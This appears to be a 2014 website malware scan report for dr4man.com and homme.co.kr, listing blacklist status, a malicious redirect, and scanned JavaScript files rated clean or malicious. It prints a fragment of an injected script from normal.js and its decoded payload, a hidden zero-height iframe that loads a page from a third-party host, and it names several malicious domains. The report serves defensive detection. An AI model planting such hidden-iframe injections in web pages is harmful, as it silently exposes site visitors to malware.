Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dr4man.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://best100dealers.com.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: best100dealers.com.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 27 Sep 2014 16:04:31 GMT Location: http://gen.xyz/availability-checker.php?src=best100dealers.com.com Server: nginx/1.4.6 (Ubuntu) Content-Type: text/html X-Powered-By: PHP/5.5.9-1ubuntu4.4 | malicious |
Scanned pages/files
Request | Server response | Status |
http://dr4man.com/ | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:19 GMT Content-Length: 2292 | malicious |
http://homme.co.kr/ | 200 OK Content-Length: 41821 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: m.dr4nose.com <script type="text/javascript"> var mobileKeyWords = new Array('iPhone', 'iPod', 'BlackBerry', 'Android', 'Windows CE', 'LG', 'MOT', 'SAMSUNG', 'SonyEricsson'); for (var word in mobileKeyWords){ if (navigator.userAgent.match(mobileKeyWords[word]) != null){ location.href = "http://m.dr4nose.com"; break; } } </script> <script type="text/javascript" src="http://wcs.naver.net/wcslog.js"></script> <script type="text/javascript"> if(!wcs_add) var wcs_add = {}; wcs_add["wa"] = "6069f9d0b556b4"; wcs_do(); </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccoun ...[4074 bytes skipped]... | ||
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16651 Content-Type: application/javascript | clean |
http://dr4man.com/js/normal.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:27 GMT Content-Length: 2331 | malicious |
http://homme.co.kr/js/normal.js | 200 OK Content-Length: 1927 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getXMLHttpRequest() { if (window.ActiveXObject) { try { return new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { return new ActiveXObject("Microsoft.XMLHTTP"); } catch(e1) { return null; } } } else if (window.XMLHttpReques Decoded script: <iframe src=http://mirclinic.com/amzone/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://dr4man.com/js/jquery.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:31 GMT Content-Length: 2331 | malicious |
http://homme.co.kr/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://dr4man.com/js/jquery.easing.1.3.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:35 GMT Content-Length: 2364 | malicious |
http://homme.co.kr/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/x-javascript | clean |
http://dr4man.com/js/mainImgSlide.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:38 GMT Content-Length: 2349 | malicious |
http://homme.co.kr/js/mainimgslide.js | 200 OK Content-Length: 2961 Content-Type: application/x-javascript | clean |
http://dr4man.com/js/smsBanMove.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:40 GMT Content-Length: 2343 | malicious |
http://homme.co.kr/js/smsbanmove.js | 200 OK Content-Length: 828 Content-Type: application/x-javascript | clean |
http://dr4man.com/js/flashObject.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:41 GMT Content-Length: 2346 | malicious |
http://homme.co.kr/js/flashobject.js | 200 OK Content-Length: 1099 Content-Type: application/x-javascript | clean |
http://dr4man.com/js/topMenuFlash.js | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:43 GMT Content-Length: 2349 | malicious |
http://homme.co.kr/js/topmenuflash.js | 200 OK Content-Length: 181 Content-Type: application/x-javascript | clean |
http://dr4man.com//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 200 OK Connection: close Date: Sun, 20 Jul 2014 15:18:44 GMT Content-Length: 2436 | malicious |
http://homme.co.kr//www.googleadservices.com/pagead/conversion.js/ | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
http://homme.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |